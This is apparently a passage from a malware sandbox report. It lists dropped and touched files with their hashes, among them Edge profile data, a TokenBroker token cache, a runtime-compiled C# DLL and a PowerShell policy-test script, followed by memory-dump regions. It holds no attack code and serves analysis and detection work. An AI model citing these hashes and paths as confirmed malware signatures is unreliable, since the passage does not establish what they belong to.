                                                                a9f1a8a91e54edb2b8e1d386d6f4acfe24016b12

                                                                SHA256

                                                                64d803b3b0b846aebce7e9682d84e312ebc1440cb173fc4d1364a9e75dece58c

                                                                SHA512

                                                                f744a512c3b2e030d6a387b4c961a79c5562c0924746220a02324ef6b5a9ce1b58d2926a2515b61c76798a7db46a5c5515072bd6deca30cffd6cc2fe5294f381

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\0fc6f7c5-ba86-48f0-8560-dff2f42d25af\index-dir\the-real-index~RFe5798c5.TMP

                                                                Filesize

                                                                2KB

                                                                MD5

                                                                bcc8812ad0f8f37dd7151537c2c32f8e

                                                                SHA1

                                                                89d561bd857bbf2f02ae44253b2181431cc85871

                                                                SHA256

                                                                d2a8d6ca44819eb7909bedec7f74f68ae1387866adcedebd320d31f9a1b73d56

                                                                SHA512

                                                                72d6a39f18058bcdd3c2ee447fe13bcb43210aeeeca1b2e625e6407e86013e5da974c8f8a64a1c2224ef793c552b46fe458b1c9114f4b2bd81b96a9a951c7eeb

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\b2667d68-3d19-4df9-ab2b-65f3cd37f941.tmp

                                                                Filesize

                                                                1B

                                                                MD5

                                                                5058f1af8388633f609cadb75a75dc9d

                                                                SHA1

                                                                3a52ce780950d4d969792a2559cd519d7ee8c727

                                                                SHA256

                                                                cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8

                                                                SHA512

                                                                0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                Filesize

                                                                39KB

                                                                MD5

                                                                08a98ed9e14066a563da4f73f185776e

                                                                SHA1

                                                                782731b0e39a3e6e89aefc6021909f24e5ae4bb2

                                                                SHA256

                                                                c3c670af75701aed6877ef516026d7291d38c35f29447a11be18b18e71254ab4

                                                                SHA512

                                                                ee2c553690e0480d40a38fcde06e3c4ee1d892cff2fc255938d32e5f0af771a6419ec19e6120ed921dabce8c4f4f05cb3d9ddd9eeb8cefbb2641db134a59f4fc

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                Filesize

                                                                39KB

                                                                MD5

                                                                6a453e9c77c3e7668179bc499e5dde17

                                                                SHA1

                                                                4f8a566f5826525ecadd1bf0a74e25088d1071c0

                                                                SHA256

                                                                802682aaecc1a4e1c0d713ac9b3d6a6d43f10f7f2ccfc59871f9fd9856fa23f1

                                                                SHA512

                                                                ecd07a7f5f40d919303f005f43ff4fbed915fcc53a21b2e0cdd7e0d4700c8c122bba34a5b37f67720919ecade456de91139a02c82efddf527dcee3b209232d8a

                                                              • C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres

                                                                Filesize

                                                                2KB

                                                                MD5

                                                                cdaa77769ee24f4183ebab68c3e00ed5

                                                                SHA1

                                                                a578c607b1e8b3307d52d53f61e80c4e392b5e52

                                                                SHA256

                                                                178e41f0088fb20bd0069622e91cac6817fc3811baf6c5c95c5e03fc01a4dd6c

                                                                SHA512

                                                                4166e3eb55ddd445cbb361bd4d97b347f6cd2bc2f2fbee9d338e1f10ebfddfa37c45e3446767321ffb987272bfd8581ade8ea364d98dfeef34b86efb44a06cc3

                                                              • C:\Users\Admin\AppData\Local\Temp\3sqz0ne1\3sqz0ne1.dll

                                                                Filesize

                                                                4KB

                                                                MD5

                                                                c9502303989cda40d7d8a516662853bb

                                                                SHA1

                                                                aba250755699cd1e8438f17d80d11168e4e5b7f2

                                                                SHA256

                                                                6e5507af17a40fac4faa9f25db52a0d699456c699e8215e5f32c8c678d131c8b

                                                                SHA512

                                                                321462ba3f204fb2298895998aefa3ebf5dfecf62bb99d9064008f2cc4bb577abdceaf6b597d5f73d70135261c7bb6628f5d830fecd6fce58699f84cdb1effc3

                                                              • C:\Users\Admin\AppData\Local\Temp\RES732C.tmp

                                                                Filesize

                                                                1KB

                                                                MD5

                                                                d77f5ff08ccbc25bf9bb42761b94e7f9

                                                                SHA1

                                                                9b8bcdc7b692358b22c8ac3c1facab7e4c86f8ed

                                                                SHA256

                                                                7fb70e544e4d4be22ebcdd94e7fb8e0ec2eeed6e5474a73302a1e3e0adedc46c

                                                                SHA512

                                                                30da3a110ad087d5b17d1876c865d356257772daa518623f1b66d1aa65a95bc8e86d08135e30bc566d765e2f612d57c2a6d94fe06f732671de4c88594fde0b18

                                                              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_s05mvnmi.soc.ps1

                                                                Filesize

                                                                60B

                                                                MD5

                                                                d17fe0a3f47be24a6453e9ef58c94641

                                                                SHA1

                                                                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                SHA256

                                                                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                SHA512

                                                                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                              • C:\Users\Admin\AppData\Local\Temp\scoped_dir3192_951265332\c6fb0e30-abc0-4f0f-b700-48149ce56894.tmp

                                                                Filesize

                                                                156KB

                                                                MD5

                                                                b384b2c8acf11d0ca778ea05a710bc01

                                                                SHA1

                                                                4d3e01b65ed401b19e9d05e2218eeb01a0a65972

                                                                SHA256

                                                                0a6b11a5b642bf6c1938189707e109a1f48eb02018cfb146f09e74a753567d1b

                                                                SHA512

                                                                272dd92a3efbf6cefe4b13127e09a9bd6455f5fc4913e7477c6712e4c3fd67efe87bd0d5bf1ec6b1e65f8d3aa0ac99d5bcf88d8a44d3f3116527253a01dde3be

                                                              • C:\Users\Admin\AppData\Local\Temp\tmp61F6.tmp

                                                                Filesize

                                                                36KB

                                                                MD5

                                                                40a13f9b39d6d3e649cf21f1b47da9ad

                                                                SHA1

                                                                b03d7f8ad2f90c61063e54cf45c01677f6a86942

                                                                SHA256

                                                                3cd5effba4bc90a72efe5e97609c962dd91d5b50e41f13bfa0f5606d322a5278

                                                                SHA512

                                                                7e821747ca4db1654c3ce01e31bc0bddfeb092464b0dea9aa8d5370c01dc0fc141fedcd168553c502a417b7703ced120ff53448c4135338cdff937a6f5f9cd5b

                                                              • \??\c:\Users\Admin\AppData\Local\Temp\3sqz0ne1\3sqz0ne1.0.cs

                                                                Filesize

                                                                1KB

                                                                MD5

                                                                3d1018b223caf0c61982a29cb26996cc

                                                                SHA1

                                                                743fd8c82380e7d72ec1cb2e05f149e148874b0e

                                                                SHA256

                                                                786a71b68cee9392682824e67abfb89e5ec70ee6fb37213491b5c9a95ac59c92

                                                                SHA512

                                                                7a632143e76410669fff27e2fa184d572a788e9d315f7c2415c7013cb07026678fe1b3e4fb1a77411f82941d7a03c64632c07d3fc1398e2df5741471b9462980

                                                              • \??\c:\Users\Admin\AppData\Local\Temp\3sqz0ne1\3sqz0ne1.cmdline

                                                                Filesize

                                                                369B

                                                                MD5

                                                                f78751ab1ea7f1ef1dcfec340b7270b1

                                                                SHA1

                                                                d0d26b482caaf127c6425ec5ae7e7732268d2424

                                                                SHA256

                                                                7d2060c47ca4e7f28c0761eee2e5aa6b77109ba16fe876e232ce7dd43d13e2a4

                                                                SHA512

                                                                74cc6622020ef00dca719dd9cb01e1fb812cd6db67298595d7a179a6491f89744caf7c8039094c303b10f7f186ad1af50a80fa0c7417819ea39a6f54f9f1f7e8

                                                              • \??\c:\Users\Admin\AppData\Local\Temp\3sqz0ne1\CSCB76A280560FE48389084FC30EF7E3DC5.TMP

                                                                Filesize

                                                                652B

                                                                MD5

                                                                2d1bafe9e2a21dcc8240fdddd29c1d18

                                                                SHA1

                                                                85650b380513c043e3ae885ac23440d3b8b799d0

                                                                SHA256

                                                                7056fdbb15b4ad22bf6e18d6be1109e5346dee95813277f2979be01484d2985d

                                                                SHA512

                                                                fd9ecc21dbc387c843b68037003f1984a51a81541e770bb0ed8d595204aabe25714435f21b87faf1f604cb54a6ab7c584a9e9e616e0270bd7e121eaa94c50802

                                                              • memory/4128-414-0x0000000000400000-0x0000000000439000-memory.dmp

                                                                Filesize

                                                                228KB

                                                              • memory/4128-74-0x0000000000400000-0x0000000000439000-memory.dmp

                                                                Filesize

                                                                228KB

                                                              • memory/4128-1040-0x0000000000400000-0x0000000000439000-memory.dmp

                                                                Filesize

                                                                228KB

                                                              • memory/4128-1-0x0000000000400000-0x0000000000439000-memory.dmp

                                                                Filesize

                                                                228KB

                                                              • memory/4128-194-0x0000000000400000-0x0000000000439000-memory.dmp

                                                                Filesize

                                                                228KB

                                                              • memory/4128-380-0x0000000000400000-0x0000000000439000-memory.dmp

                                                                Filesize

                                                                228KB

                                                              • memory/4128-383-0x0000000000400000-0x0000000000439000-memory.dmp

                                                                Filesize

                                                                228KB

                                                              • memory/4128-387-0x0000000000400000-0x0000000000439000-memory.dmp

                                                                Filesize

                                                                228KB

                                                              • memory/4128-388-0x0000000000400000-0x0000000000439000-memory.dmp

                                                                Filesize

                                                                228KB

                                                              • memory/4128-389-0x0000000000400000-0x0000000000439000-memory.dmp

                                                                Filesize

                                                                228KB

                                                              • memory/4128-393-0x0000000000400000-0x0000000000439000-memory.dmp

                                                                Filesize

                                                                228KB

                                                              • memory/4128-394-0x0000000000400000-0x0000000000439000-memory.dmp

                                                                Filesize

                                                                228KB

                                                              • memory/4128-398-0x0000000000400000-0x0000000000439000-memory.dmp

                                                                Filesize

                                                                228KB

                                                              • memory/4128-399-0x0000000000400000-0x0000000000439000-memory.dmp

                                                                Filesize

                                                                228KB

                                                              • memory/4128-400-0x0000000000400000-0x0000000000439000-memory.dmp

                                                                Filesize

                                                                228KB

                                                              • memory/4128-401-0x0000000000400000-0x0000000000439000-memory.dmp

                                                                Filesize

                                                                228KB

                                                              • memory/4128-404-0x0000000000400000-0x0000000000439000-memory.dmp

                                                                Filesize

                                                                228KB

                                                              • memory/4128-408-0x0000000000400000-0x0000000000439000-memory.dmp

                                                                Filesize

                                                                228KB

                                                              • memory/4128-409-0x0000000000400000-0x0000000000439000-memory.dmp

                                                                Filesize

                                                                228KB

                                                              • memory/4128-410-0x0000000000400000-0x0000000000439000-memory.dmp

                                                                Filesize

                                                                228KB

                                                              • memory/4128-419-0x0000000000400000-0x0000000000439000-memory.dmp

                                                                Filesize

                                                                228KB

                                                              • memory/4128-0-0x0000000000400000-0x0000000000439000-memory.dmp

                                                                Filesize

                                                                228KB

                                                              • memory/4128-418-0x0000000000400000-0x0000000000439000-memory.dmp

                                                                Filesize

                                                                228KB

                                                              • memory/4128-420-0x0000000000400000-0x0000000000439000-memory.dmp

                                                                Filesize

                                                                228KB

                                                              • memory/4128-1036-0x0000000000400000-0x0000000000439000-memory.dmp

                                                                Filesize

                                                                228KB

                                                              • memory/4128-1035-0x0000000000400000-0x0000000000439000-memory.dmp

                                                                Filesize

                                                                228KB

                                                              • memory/4128-16-0x0000000000400000-0x0000000000439000-memory.dmp

                                                                Filesize

                                                                228KB

                                                              • memory/4128-15-0x0000000000400000-0x0000000000439000-memory.dmp

                                                                Filesize

                                                                228KB

                                                              • memory/4128-10-0x0000000000400000-0x0000000000439000-memory.dmp

                                                                Filesize

                                                                228KB

                                                              • memory/4128-9-0x0000000000400000-0x0000000000439000-memory.dmp

                                                                Filesize

                                                                228KB

                                                              • memory/4128-1018-0x0000000000400000-0x0000000000439000-memory.dmp

                                                                Filesize

                                                                228KB

                                                              • memory/4128-2-0x0000000000400000-0x0000000000439000-memory.dmp

                                                                Filesize

                                                                228KB

                                                              • memory/4128-1022-0x0000000000400000-0x0000000000439000-memory.dmp

                                                                Filesize

                                                                228KB

                                                              • memory/4128-1025-0x0000000000400000-0x0000000000439000-memory.dmp

                                                                Filesize

                                                                228KB

                                                              • memory/4128-1027-0x0000000000400000-0x0000000000439000-memory.dmp

                                                                Filesize

                                                                228KB

                                                              • memory/4128-1028-0x0000000000400000-0x0000000000439000-memory.dmp

                                                                Filesize

                                                                228KB

                                                              • memory/4128-1031-0x0000000000400000-0x0000000000439000-memory.dmp

                                                                Filesize

                                                                228KB

                                                              • memory/4128-1032-0x0000000000400000-0x0000000000439000-memory.dmp

                                                                Filesize

                                                                228KB

                                                              • memory/4128-1033-0x0000000000400000-0x0000000000439000-memory.dmp

                                                                Filesize

                                                                228KB

                                                              • memory/4128-1034-0x0000000000400000-0x0000000000439000-memory.dmp

                                                                Filesize

                                                                228KB

                                                              • memory/5684-19-0x000001AFA6070000-0x000001AFA6080000-memory.dmp

                                                                Filesize

                                                                64KB

                                                              • memory/5684-20-0x000001AFA6070000-0x000001AFA6080000-memory.dmp

                                                                Filesize

                                                                64KB

                                                              • memory/5684-22-0x000001AFA5FF0000-0x000001AFA6012000-memory.dmp

                                                                Filesize

                                                                136KB

                                                              • memory/5684-183-0x000001AFA8230000-0x000001AFA8238000-memory.dmp

                                                                Filesize

                                                                32KB